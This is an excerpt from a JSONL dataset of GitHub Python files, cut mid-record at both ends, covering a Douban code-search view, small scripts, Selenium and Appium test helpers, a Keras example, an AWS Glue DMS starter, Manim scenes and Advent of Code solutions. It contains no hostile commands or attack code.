std:{catboost_cross_score[\"test_score\"].std()}')\n\n","repo_name":"aorursy/new-nb-3","sub_path":"hiro1005_restaurant-revenue-prediction.py","file_name":"hiro1005_restaurant-revenue-prediction.py","file_ext":"py","file_size_in_byte":26356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43025070772","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom urllib import urlencode\n\nfrom quixote.errors import TraversalError\n\nfrom vilya.libs.template import st\nfrom vilya.models.elastic.searcher import SearchEngine\nfrom vilya.models.elastic import CodeSearch\nfrom vilya.models.elastic.src_search import SrcSearch\nfrom vilya.models.elastic.repo_search import RepoSearch\nfrom vilya.models.elastic.user_search import UserSearch\nfrom vilya.models.elastic.issue_pr_search import PullRequestSearch, IssueSearch\nfrom vilya.models.elastic.consts import (\n SEARCH_URL_ROOT, ADMINS, K_REPO, K_CODE, K_USER, K_DOC, K_PULL, K_ISSUE,\n PERPAGE_LIMIT, SEARCH_KINDS, KIND_ORDERS_MAP, CODE_ORDERS)\nfrom vilya.models.project import CodeDoubanProject\nfrom vilya.views.util import require_login\nfrom tasks import index_srcs_action, index_repos_action, index_users_action\n\nKIND_CLASS_MAP = {\n K_REPO: RepoSearch,\n K_CODE: SrcSearch,\n K_DOC: CodeSearch,\n K_USER: UserSearch,\n K_PULL: PullRequestSearch,\n K_ISSUE: IssueSearch,\n}\n\n\nclass SearchUI(object):\n\n _q_exports = ['count', 'xml']\n\n def __init__(self, project=None):\n self.project = project\n\n def _q_index(self, request):\n q = request.get_form_var('q', '')\n kind = request.get_form_var('kind', str(K_CODE))\n order = request.get_form_var('s', '')\n order = int(order) if order else ''\n page = request.get_form_var('page')\n page = int(page) if page and page.isdigit() else 1\n project = CodeDoubanProject.get_by_name(self.project) \\\n if self.project else None\n state = request.get_form_var('state', '')\n language = request.get_form_var('language', '')\n doctype = request.get_form_var('doctype', '')\n\n if not kind.isdigit() and int(kind) not in SEARCH_KINDS:\n raise TraversalError()\n\n kind = int(kind)\n orders = KIND_ORDERS_MAP.get(kind, CODE_ORDERS)\n sort_data = orders.get(order)\n if sort_data:\n sort_data = sort_data[1]\n\n limit = PERPAGE_LIMIT\n total = 0\n offset = (page - 1) * limit\n result = {}\n formated_result = []\n facets = {}\n tdt = {}\n\n cls = KIND_CLASS_MAP.get(kind)\n\n by_project = by_language = by_state = by_doctype = False\n if project and kind in (K_DOC, K_CODE, K_PULL, K_ISSUE):\n by_project = True\n if language and kind == K_CODE:\n by_language = True\n if state and kind in (K_PULL, K_ISSUE):\n by_state = True\n if doctype and kind == K_DOC:\n by_doctype = True\n\n # for facets\n if kind in (K_CODE, K_PULL, K_ISSUE, K_DOC):\n project_id = project.id if by_project else None\n result = cls.search_a_phrase(\n phrase=q, from_=0, size=0, project_id=project_id)\n facets = 
cls.format_facets(result)\n for title, data in facets.iteritems():\n for item in data:\n params = {'q': q, 'kind': kind, 's': order,\n title: item['term']}\n if by_project:\n params.update(project_id=project_id)\n item['url'] = '?' + urlencode(params)\n # highlight current term\n current = None\n if by_language:\n current = language\n elif by_state:\n current = state\n elif by_doctype:\n current = doctype\n if current and current == item['term']:\n item['selected'] = True\n del params[title]\n item['url'] = '?' + urlencode(params)\n\n # for search\n kwargs = dict(phrase=q, sort_data=sort_data, from_=offset, size=limit)\n if by_project:\n kwargs.update(project_id=project.id)\n if by_language:\n kwargs.update(language=language)\n if by_state:\n kwargs.update(state=state)\n if by_doctype:\n kwargs.update(doctype=doctype)\n\n result = cls.search_a_phrase(**kwargs)\n formated_result = cls.format_search_result(result)\n total = SearchEngine.get_count(result)\n pages = total / limit + 1 if total % limit > 0 else total / limit\n tdt.update(request=request, q=q, kind=kind, total=total, facets=facets,\n language=language, state=state, doctype=doctype,\n result=formated_result, orders=orders, s=order, page=page,\n pages=pages)\n\n # for menu and pagenation\n SEARCH_URLS = dict()\n for k in SEARCH_KINDS:\n if project and k in (K_CODE, K_DOC, K_PULL, K_ISSUE):\n url_root = '/%s/search' % project.name\n else:\n url_root = SEARCH_URL_ROOT\n params = {'q': q, 'kind': k, 's': order}\n if state and k in (K_PULL, K_ISSUE):\n params.update({'state': state})\n if language and k == K_CODE:\n params.update({'language': language})\n if doctype and k == K_DOC:\n params.update({'doctype': doctype})\n url = '%s?' % url_root + urlencode(params)\n SEARCH_URLS[k] = url\n\n tdt.update(SEARCH_URLS=SEARCH_URLS)\n\n return st('search/base.html', **tdt)\n\n def count(self, request):\n request.response.set_content_type('application/json; charset=utf8')\n q = request.get_form_var('q', '')\n project = CodeDoubanProject.get_by_name(self.project) \\\n if self.project else None\n state = request.get_form_var('state', '')\n language = request.get_form_var('language', '')\n doctype = request.get_form_var('doctype', '')\n counts = {}\n\n for kind, cls in KIND_CLASS_MAP.iteritems():\n kwargs = dict(phrase=q, from_=0, size=0)\n if project and kind in (K_DOC, K_CODE, K_PULL, K_ISSUE):\n kwargs.update(project_id=project.id)\n if language and kind == K_CODE:\n kwargs.update(language=language)\n if state and kind in (K_PULL, K_ISSUE):\n kwargs.update(state=state)\n if doctype and kind == K_DOC:\n kwargs.update(doctype=doctype)\n result = cls.search_a_phrase(**kwargs)\n counts[kind] = SearchEngine.get_count(result)\n\n tdt = {\n 'q': q,\n 'repos': counts[K_REPO],\n 'codes': counts[K_CODE],\n 'users': counts[K_USER],\n 'docs': counts[K_DOC],\n 'pulls': counts[K_PULL],\n 'issues': counts[K_ISSUE],\n }\n return json.dumps(tdt)\n\n def _q_lookup(self, request, urlpart):\n if urlpart == 'repo_index':\n return RepoIndexUI()\n elif urlpart == 'user_index':\n return UserIndexUI()\n\n def xml(self, request):\n request.response.set_content_type(\n 'application/opensearchdescription+xml')\n return st('search/firefox_search.xml')\n\n\nclass SrcIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'update_mapping',\n 'delete_mapping']\n\n def __init__(self, project_name):\n self.project = CodeDoubanProject.get_by_name(project_name)\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n 
and self.project and (action in self._actions)):\n index_srcs_action(action, self.project.id)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_CODE)\n raise TraversalError()\n\n\nclass RepoIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'delete_mapping']\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n and (action in self._actions)):\n index_repos_action(action)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_REPO)\n raise TraversalError()\n\n\nclass UserIndexUI(object):\n _q_exports = []\n _actions = ['update', 'create', 'delete', 'delete_mapping']\n\n @require_login\n def _q_lookup(self, request, action):\n if (request.user.name in ADMINS\n and (action in self._actions)):\n index_users_action(action)\n return request.redirect(SEARCH_URL_ROOT + '?kind=%s' % K_USER)\n","repo_name":"douban/code","sub_path":"vilya/views/hub/search_beta.py","file_name":"search_beta.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":1812,"dataset":"github-code","pt":"18"} +{"seq_id":"3320692296","text":"'''\ntrain vs test\ndcase synth : fold 1, 2 \ndcase stars : fold 3, 4\nlocata: fold 5(orig eval), 6(orig dev)\nmetu: fold 7, 8 Train vs test [146, 98]\nmarco: fold 9, 10\n'''\n\n#imports\nimport os\n\n#marco\nmetu_fold = {'test':'fold8_', 'train':'fold7_'}\n\nmetu_meta = '/vast/sk8974/experiments/dsynth/data/input/gen_dcase_stars_loc_metu_marco/metadata_dev/metu'\nmetu_mic = '/vast/sk8974/experiments/dsynth/data/input/gen_dcase_stars_loc_metu_marco/mic_dev/metu'\n\ndef is_train(file):\n x,y,z = int(file[0]), int(file[1]), int(file[2])\n if z-2>=0:\n return True\n\nfor dir_type in [metu_mic]:\n for file in os.listdir(dir_type):\n if not is_train(file):\n src = os.path.join(dir_type,file)\n dst = os.path.join(dir_type,metu_fold['test']+file)\n os.rename(src,dst)\n else:\n src = os.path.join(dir_type,file)\n dst = os.path.join(dir_type,metu_fold['train']+file)\n os.rename(src,dst)","repo_name":"sakshamsingh1/sound_distance_estimation","sub_path":"helper/metu-sparg/rename_fold.py","file_name":"rename_fold.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4602372550","text":"with open(\"questions.txt\",\"r\") as f1:\n questions=f1.readlines()\n n,m=0,0\n for q in questions:\n m+=1\n print(q[:q.index(\"=\")+1])\n ans=q[q.index(\"=\")+1:q.index(\"\\n\")]\n #print(ans)\n with open(\"answers.txt\",\"r+\") as f2:\n f2.read()\n ansin=input()\n #print(ansin)\n f2.write(ansin+\"\\n\")\n if(ansin==ans):\n n+=1\n print(\"Your score is {}/{}\".format(n,m))\n","repo_name":"Eldo123/Python-Projects","sub_path":"Simple Projects/Q&A/Q&A.py","file_name":"Q&A.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74281608039","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\nurl = 'http://automationpractice.com/index.php?id_category=3&controller=category'\ndriver.get(url)\n\n\nproduct_containers = driver.find_elements_by_class_name('product-container')\n\n# enumerate() is used\nfor index,product_container in enumerate(product_containers):\n time.sleep(2)\n hover = ActionChains(driver).move_to_element(product_container)\n hover.perform()\n\n #click on add to cart\n 
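# note: enumerate() is 0-based while XPath li[] indexing is 1-based, hence the %(index+1) substitution below\n 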
#('//*[@id=\"center_column\"]/ul/li[1]/div/div[2]/div[2]/a[1]/span') is changed to\n #('//*[@id=\"center_column\"]/ul/li[%s]/div/div[2]/div[2]/a[1]/span'%(index+1))\n # index of the list is replaced by %s which is the index each iteration since we adding in the cart each\n # of the item\n\n driver.find_element_by_xpath('//*[@id=\"center_column\"]/ul/li[%s]/div/div[2]/div[2]/a[1]/span'%(index+1)).click()\n\n time.sleep(5)\n #click on Continue Shopping\n driver.find_element_by_css_selector('#layer_cart > div.clearfix > div.layer_cart_cart.col-xs-12.col-md-6 > div.button-container > span > span > i').click()\n print(index)\n\n\n\n\n\n","repo_name":"greenwarrior/AutomationTesting_PYTHON","sub_path":"API_Scripting_Python/3_4_SeleniumPageSetup.py","file_name":"3_4_SeleniumPageSetup.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3016784335","text":"# -*- coding: utf-8 -*-\nimport unittest\nfrom tests.sensors.simulated_topology_sensor import SimulatedTopologySensor\nfrom tests.topology.topology_factory import TopologyFactory\nfrom topology.topology_map import OUT_OF_BOUNDS\nfrom geometry.point import Point2D\n\nX = OUT_OF_BOUNDS # For convenience in test comparisons, just call it X\n\n\nclass TestSimulatedTopologySensor(unittest.TestCase):\n \"\"\"\n Remember that in the test cases, the expected matrices must be flipped because\n increasing row means decreasing Y\n \"\"\"\n\n def setUp(self):\n simulated_map = TopologyFactory.make_from_matrix([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])\n self.sensor = SimulatedTopologySensor(simulated_map, power_on_cost=10, scan_point_cost=2)\n\n def test_scan_points(self):\n \"\"\"\n Just one test because it's trivial. 
Try scanning a row, with values out of bounds on both sides\n :return:\n \"\"\"\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n expecting = [(-1, 0, X, Point2D(-1, 1)), (0, 0, 5, Point2D(0, 1)), (1, 0, 6, Point2D(1, 1)),\n (100, 100, X, Point2D(100, 101))]\n scan_results, scan_cost = self.sensor.scan_points(offsets, home_point)\n self.assertEqual(expecting, scan_results)\n\n def test_scan_cost(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n _, scan_cost = self.sensor.scan_points(offsets, home_point)\n self.assertEqual(8, scan_cost) # assumed value: test_scan_total_cost shows two identical scans total 16\n\n def test_scan_total_cost(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n self.sensor.scan_points(offsets, home_point)\n self.sensor.scan_points(offsets, home_point)\n self.assertEqual(16, self.sensor._total_cost)\n\n def test_scan_point_count(self):\n home_point = Point2D(0, 1) # value is 5 at row 1 column 0\n offsets = [(-1, 0), (0, 0), (1, 0), (100, 100)]\n self.sensor.scan_points(offsets, home_point)\n self.sensor.scan_points(offsets, home_point)\n self.assertEqual(8, self.sensor._scan_point_count)\n","repo_name":"howientc/jeep-navigation","sub_path":"tests/sensors/test_simulated_topology_sensor.py","file_name":"test_simulated_topology_sensor.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}\n{"seq_id":"5484138242","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\n\nclass Caseread(object):\n try:\n casedata = load_workbook('./AppiumCase/autotestcase-backup.xlsx')\n except (AttributeError, FileNotFoundError):\n print(\"读取文件出错\")\n\n # 注释:用字典的方法存储Appium Case;\n # 注释:取值用法 appiumcase 中 key 值是用例名称;有几个key 即有几条 case 用法:len(appiumcase)\n # 注释:每个 case 中的操作步骤使用 二维list 存值;二维list 长度为几 case actionnumber 即为几 用法:len(Caseread.readdata()['匹配音频'])\n # 注释:每个 actionnumber list 中:0 -- Elementlocatemode、1 -- Element、2 -- Action、3 -- Content\n @classmethod\n def readdata(cls):\n casenumber = len(cls.casedata.sheetnames)\n casename = cls.casedata.sheetnames\n # 用例值存字典;读取到之后直接写入字典;即可存储多个值\n appiumcase = {}\n for index in range(casenumber):\n case = cls.casedata[casename[index]]\n row = 3\n actionum = case.cell(row=row, column=2).value\n casedetail = []\n while actionum:\n elementname = case.cell(row=row, column=3).value\n elementlocatemode = case.cell(row=row, column=4).value\n element = case.cell(row=row, column=5).value\n action = case.cell(row=row, column=6).value\n content = case.cell(row=row, column=7).value\n attribute = case.cell(row=row, column=8).value\n casedetail.append([elementlocatemode, element, action, content, elementname, attribute])\n appiumcase[casename[index]] = casedetail\n row += 1\n actionum = case.cell(row=row, column=2).value\n return appiumcase\n\n\nif __name__ == '__main__':\n print(Caseread.readdata())\n print(len(Caseread.readdata()))\n print(len(Caseread.readdata()['用户登录']))\n","repo_name":"william-xiangzi/AppiumAutoTest","sub_path":"ExcleDataFetch.py","file_name":"ExcleDataFetch.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}\n{"seq_id":"29661223406","text":"from xsertion import XCNNBuilder\nfrom data import get_cifar, val_split\n\nfrom keras.models import Model\nfrom keras.layers import Lambda, Input\nfrom 
keras.callbacks import EarlyStopping\n\nfrom kerasnet import get_kerasnet # Specify the model in a separate file.\n\n# Xsertion will log heavily on DEBUG level. Enable it if it is desired to see details logs.\nimport logging\nlogging.basicConfig(level=logging.DEBUG, filename='example.log') # Will put logs into example.log in cwd\n\n# A little utility to determine dimension ordering.\n\nimport keras.backend as K\ninput_shape = (3, 32, 32)\npr_axis = 1 # This is the \"chanel axis\" or here principal axis. We will separate (and put back) modalities along this.\nif K.image_dim_ordering() == 'tf':\n input_shape = (32, 32, 3)\n pr_axis = 3\n\n\n# Prepare the data\n\np = 1. # Use full dataset (i.e. retain 100% per-class examples)\nuse_c10 = True # Let's use CIFAR-10, set to false for 100\n\n# get_cifar utility will perform linear transform into YUV space\nnb_classes, X_train, Y_train, X_val, Y_val, X_test, Y_test = get_cifar(p=p, append_test=False, use_c10=use_c10)\nX_t, Y_t, X_v, Y_v = val_split(0.2, X_train, Y_train) # split training data 80/20 for Xsertion to use internally\n\n\nblueprint_model = get_kerasnet(nb_classes, input_shape, pr_axis) # get KerasNet appropriate for keras/tf/th config\n\n\n# Xsertion start\n\n# Xsertion understands specification of modalities as \"input model\" where outputs are modalities.\n# This model is not touched by Xsertion, only its outputs are used, feel free to go crazy here.\n# However you define the input to this model, its inputs has to match the input data that's passed to Xsertion (Duh).\ninp = Input(shape=input_shape)\nif K.image_dim_ordering() == 'tf':\n lb1 = Lambda(lambda x: x[:, :, :, 0:1], output_shape=(32, 32, 1))(inp)\n lb2 = Lambda(lambda x: x[:, :, :, 1:2], output_shape=(32, 32, 1))(inp)\n lb3 = Lambda(lambda x: x[:, :, :, 2:3], output_shape=(32, 32, 1))(inp)\nelse:\n lb1 = Lambda(lambda x: x[:, 0:1, :, :], output_shape=(1, 32, 32))(inp)\n lb2 = Lambda(lambda x: x[:, 1:2, :, :], output_shape=(1, 32, 32))(inp)\n lb3 = Lambda(lambda x: x[:, 2:3, :, :], output_shape=(1, 32, 32))(inp)\ninput_model = Model(input=inp, output=[lb1, lb2, lb3])\n\nalpha = 1 # alpha hyper\nbeta = 2 # beta hyper\nbuilder = XCNNBuilder(blueprint_model, input_model, alpha=alpha, beta=beta)\n# create an XCNNBuilder, Xsertion will go crazy tearing apart blueprint_model and transforming/analysing it for internal\n# use. Not considering training/data processing this is the most time consuming step.\n\nbuilder.set_xspot_strategy(strategy='after_pooling') # set after_pooling heuristic to be used for placing connections\n# Alternatively, go with 'resnet' for branching/merging topologies. Or just specify layernames if you have exact idea\n# where you want connections.\n\nbuilder.set_xcons(use_bn=False, activation='relu', bias=False) # Pass whatever keywords you could pass to Convolution,\n# to customise the connection/adjust it for your model. Here just turning off bias as an example).\n# Two special arguments are available, use_bn, which will insert appropriate BatchNormalistion along the connection.\n# Alternatively, use model_function to specify a function that returns a connection model (similar to input model)\n# to customise connections. It's signiture is (nb_filter, inbount_name=None, name=None)->Model. 
# nb_filter will be set\n# to what Xsertion thinks the number of filters along these connections should be.\n\nbuilder.compile(loss='categorical_crossentropy',\n                optimizer='adam',\n                metrics=['accuracy'])\n# Anything that would go into vanilla compile.\n\nbuilder.fit(X_t, Y_t, batch_size=32, nb_epoch=80, validation_data=(X_v, Y_v), verbose=2,\n            callbacks=[EarlyStopping(monitor='val_acc', min_delta=1e-4, patience=15, verbose=2)])\n# Anything that would go into fit. Note this does not perform any work yet.\n\n# Kick off Xsertion\n\nxcnn_model = builder.build() # This is a good time to go grab a cup of tea.\nbuilder.print_report() # Get some information about how building went.\n\n# Need to use different hypers?\nbuilder.alpha = 2\nxcnn_model = builder.build() # It will use cached measures to quickly give another model.\n# Note xcnn_model is not trained.\n\n# Feeling like it could be better?\n# Not sure if certain pairs of modalities are even sensible?\n# Try\nxcnn2_model = builder.build_scaled_double_xcon() # This will use another round of measures between pairs of modalities.\n# Note xcnn2_model is not trained.\n# Though it should be noted, we did not observe much gain when using this methodology. Instead consider:\n\n\nxcnn_iter_model = builder.build_iter(.1, Nasterov=True, iter_max=15, rep=1) # This will commence combined learning\n# to produce the model. The first parameter is the initial learning rate. Nasterov controls whether Nasterov\n# acceleration is applied to the adaptive momentum. If the building process is too noisy and the steps seem not\n# sensible, try adjusting the learning rate. If push comes to shove, increase the repetitions (rep).\n\n# This produces a trained model, but only on the 80% of the training data that was supplied. For a fair comparison,\n# consider finishing training using the full training set.\n\n# Train.\n\n","repo_name":"karazijal/xsertion","sub_path":"example_kerasnet.py","file_name":"example_kerasnet.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"40065559743","text":"import sys\nimport json\nimport io\nimport pandas as pd\nimport numpy as np\nimport boto3\nimport requests\nimport urllib\nimport base64\nimport math\nimport time\nimport ast\nimport re\nimport psycopg2\nfrom psycopg2 import extras\nfrom datetime import datetime\nfrom custom_utils.utils import fetchFromS3, putToS3\nfrom awsglue.utils import getResolvedOptions\n\n\n# define job parameters\nargs = getResolvedOptions(\n    sys.argv, [\"TEMP_BUCKET_NAME\", \"EPO_INSTITUTION_NAME\", \"DB_SECRET_NAME\", \"DMS_TASK_ARN\"])\nTEMP_BUCKET_NAME = args[\"TEMP_BUCKET_NAME\"]\nEPO_INSTITUTION_NAME = args[\"EPO_INSTITUTION_NAME\"]\nDB_SECRET_NAME = args[\"DB_SECRET_NAME\"]\nDMS_TASK_ARN = args[\"DMS_TASK_ARN\"]\n\ndef main(argv):\n\n    dms_client = boto3.client(\"dms\")\n\n    # check if dms task in READY state (initial deployment)\n    response = dms_client.describe_replication_tasks(\n        Filters=[\n            {\n                \"Name\": \"replication-task-arn\",\n                
\"Values\": [\n DMS_TASK_ARN\n ]\n }\n ],\n WaiterConfig={\n \"Delay\": 30,\n \"MaxAttempts\": 80\n }\n )\n response = dms_client.start_replication_task(\n ReplicationTaskArn=DMS_TASK_ARN,\n StartReplicationTaskType='reload-target'\n )\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"UBC-CIC/Research-Innovation-Dashboard","sub_path":"back_end/cdk/glue/scripts/patents-etl/startDmsReplicationTask-patent.py","file_name":"startDmsReplicationTask-patent.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27606216804","text":"from manim import *\n\nclass DoubleArrowExample2(Scene):\n def construct(self):\n box = Square()\n p1 = box.get_left()\n p2 = box.get_right()\n d1 = DoubleArrow(p1, p2, buff=0)\n d2 = DoubleArrow(p1, p2, buff=0, tip_length=0.2, color=YELLOW)\n d3 = DoubleArrow(p1, p2, buff=0, tip_length=0.4, color=BLUE)\n Group(d1, d2, d3).arrange(DOWN)\n self.add(box, d1, d2, d3)\n\nclass DoubleArrowExample(Scene):\n def construct(self):\n circle = Circle(radius=2.0)\n d_arrow = DoubleArrow(start=circle.get_left(), end=circle.get_right())\n d_arrow_2 = DoubleArrow(tip_shape_end=ArrowCircleFilledTip, tip_shape_start=ArrowCircleFilledTip)\n group = Group(Group(circle, d_arrow), d_arrow_2).arrange(UP, buff=1)\n self.add(group)\n\nclass RightAngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT, RIGHT )\n line2 = Line( DOWN, UP )\n rightangles = [\n RightAngle(line1, line2),\n RightAngle(line1, line2, length=0.4, quadrant=(1,-1)),\n RightAngle(line1, line2, length=0.5, quadrant=(-1,1), stroke_width=8),\n RightAngle(line1, line2, length=0.7, quadrant=(-1,-1), color=RED),\n ]\n plots = VGroup()\n for rightangle in rightangles:\n plot=VGroup(line1.copy(),line2.copy(), rightangle)\n plots.add(plot)\n plots.arrange(buff=1.5)\n self.add(plots)\n\nclass FilledAngle(Scene):\n def construct(self):\n l1 = Line(ORIGIN, 2 * UP + RIGHT).set_color(GREEN)\n l2 = (\n Line(ORIGIN, 2 * UP + RIGHT)\n .set_color(GREEN)\n .rotate(-20 * DEGREES, about_point=ORIGIN)\n )\n norm = l1.get_length()\n a1 = Angle(l1, l2, other_angle=True, radius=norm - 0.5).set_color(GREEN)\n a2 = Angle(l1, l2, other_angle=True, radius=norm).set_color(GREEN)\n q1 = a1.points # save all coordinates of points of angle a1\n q2 = a2.reverse_direction().points # save all coordinates of points of angle a1 (in reversed direction)\n pnts = np.concatenate([q1, q2, q1[0].reshape(1, 3)]) # adds points and ensures that path starts and ends at same point\n mfill = VMobject().set_color(ORANGE)\n mfill.set_points_as_corners(pnts).set_fill(GREEN, opacity=1)\n self.add(l1, l2)\n self.add(mfill)\n\nclass RightArcAngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT, RIGHT )\n line2 = Line( DOWN, UP )\n rightarcangles = [\n Angle(line1, line2, dot=True),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1), dot=True, other_angle=True),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, dot=True, dot_color=YELLOW, dot_radius=0.04, other_angle=True),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, dot=True, dot_color=GREEN, dot_radius=0.08),\n ]\n plots = VGroup()\n for angle in rightarcangles:\n plot=VGroup(line1.copy(),line2.copy(), angle)\n plots.add(plot)\n plots.arrange(buff=1.5)\n self.add(plots)\n\nclass AngleExample(Scene):\n def construct(self):\n line1 = Line( LEFT + (1/3) * UP, RIGHT + (1/3) * DOWN )\n line2 = Line( DOWN + (1/3) * RIGHT, UP + (1/3) * LEFT )\n angles = [\n 
Angle(line1, line2),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1), other_angle=True),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8, other_angle=True),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED),\n Angle(line1, line2, other_angle=True),\n Angle(line1, line2, radius=0.4, quadrant=(1,-1)),\n Angle(line1, line2, radius=0.5, quadrant=(-1,1), stroke_width=8),\n Angle(line1, line2, radius=0.7, quadrant=(-1,-1), color=RED, other_angle=True),\n ]\n plots = VGroup()\n for angle in angles:\n plot=VGroup(line1.copy(),line2.copy(), angle)\n plots.add(VGroup(plot,SurroundingRectangle(plot, buff=0.3)))\n plots.arrange_in_grid(rows=2,buff=1)\n self.add(plots)","repo_name":"slowisfast2030/manimgl_1.6.1","sub_path":"project_tan/arrow_example.py","file_name":"arrow_example.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18101419152","text":"from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination\nfrom django.core.paginator import InvalidPage\n\nclass ObjectLimitOffsetPagination(LimitOffsetPagination):\n\tdefault_limit = 2\n\tmax_limit = 10\n\nclass ObjectPageNumberPagination(PageNumberPagination):\n\tpage_size = 5\n\n\tdef paginate_queryset(self, queryset, request, view=None):\n\t\tpage_size = self.get_page_size(request)\n\t\tif not page_size:\n\t\t\treturn None\n\n\t\tpaginator = self.django_paginator_class(queryset, page_size)\n\t\tpage_number = request.query_params.get(self.page_query_param, 1)\n\t\tif page_number in self.last_page_strings:\n\t\t\tpage_number = paginator.num_pages\n\n\t\ttry:\n\t\t\tself.page = paginator.page(page_number)\n\t\texcept InvalidPage as exc:\n\t\t\treturn None\n\n\t\treturn super(ObjectPageNumberPagination, self).paginate_queryset(queryset, request)","repo_name":"compsat/ls-ganap","sub_path":"api/main_events/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12974427272","text":"#!/usr/bin/python3\n# AdventCode Day 1\n\nimport time\n\n# install requirements\n# python3 -m venv advent\n# source advent/bin/activate\n# python3 -m pip install time\n\nlValues = []\n\n#\ndebug = False\n#debug = True\n# input_list_sample = open(\"day8_sample.lst\").read().splitlines()\n# input_list = open(\"day1.lst\").read().splitlines()\n\nwith open('d1.lst', 'r') as f:\n lValues = [int(x) for x in f]\n # for line in f:\n # lValues.append( int( line.strip() ) )\n\n\ndef timing(f):\n def wrap(*args, **kwargs):\n time1 = time.time()\n ret = f(*args, **kwargs)\n time2 = time.time()\n print('{:s} function took {:.3f} ms'.format(f.__name__, (time2 - time1) * 1000.0))\n return ret\n return wrap\n\n\n@timing\ndef step1():\n larger = 0\n for idx in range(0, len(lValues) - 1):\n if lValues[idx + 1] - lValues[idx] > 0:\n larger += 1\n print(f\"nb values: {len(lValues)}, Augmentations: {larger}\")\n\ndef larger(values):\n incr=0\n for idx in range(0,len(values)-1):\n if values[idx+1]>values[idx]:\n incr+=1\n return incr\n\n@timing\ndef step11():\n print(f\"step 1: nb: {len(lValues)},{larger(lValues)}\")\n\n\ndef sum_windows(x):\n if x >= 0 and x <= len(lValues):\n return lValues[x] + lValues[x + 1] + lValues[x + 2]\n\ndef get_new_values(values):\n new_puzzle=[]\n for idx in range(0,len(values)-2):\n new_puzzle.append(sum(values[idx:idx+3]))\n return new_puzzle\n\n@timing\ndef step2():\n 
increased = 0\n    new_puzzle=get_new_values(lValues)\n    #print(f'{new_puzzle}')\n    increased+=larger(new_puzzle)\n    print(f\"step2: nb values: {len(new_puzzle)}, Augmentations: {increased}\")\n\n\n# 1709\nstep1()\nstep11()\n# 1761\nstep2()","repo_name":"edgd1er/AdventCode","sub_path":"2021/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41897425635","text":"#! /usr/bin/env python\n\nimport numpy as np\nfrom scipy.io import loadmat\nfrom scipy.linalg import norm\n\n\ndef load_mat_features(data_mat_file, do_norm=True):\n    data = loadmat(data_mat_file)\n\n    if 'features' in data:\n        features = data['features']\n    elif 'feature' in data:\n        features = data['feature']\n        features = features.T\n    else:\n        raise Exception(\n            'Could not find keyword \"feature\" or \"features\" in .mat file')\n\n#    print \"features.shape: \", features.shape\n\n    if do_norm:\n        # print \"Normalize features\"\n        ftr_norm = norm(features, axis=1)\n        ftr_norm = ftr_norm.reshape((-1, 1))\n        features = features / ftr_norm\n\n    return features\n\n\nif __name__ == \"__main__\":\n    data_mat_file = r'C:/zyf/dnn_models/face_models/lfw_eval_results/center_face_model_fixbug.mat'\n\n    ftrs = load_mat_features(data_mat_file)\n\n    print('ftrs.shape: {}'.format(ftrs.shape))\n","repo_name":"walkoncross/lfw-evaluation-zyf","sub_path":"restore_feat_mirror_and_concat/load_features.py","file_name":"load_features.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"28184141880","text":"import random as r\n\nval = 0\n\nwhile True:\n    try:\n        n = int(input('level: '))\n        if n < 1 or 100 < 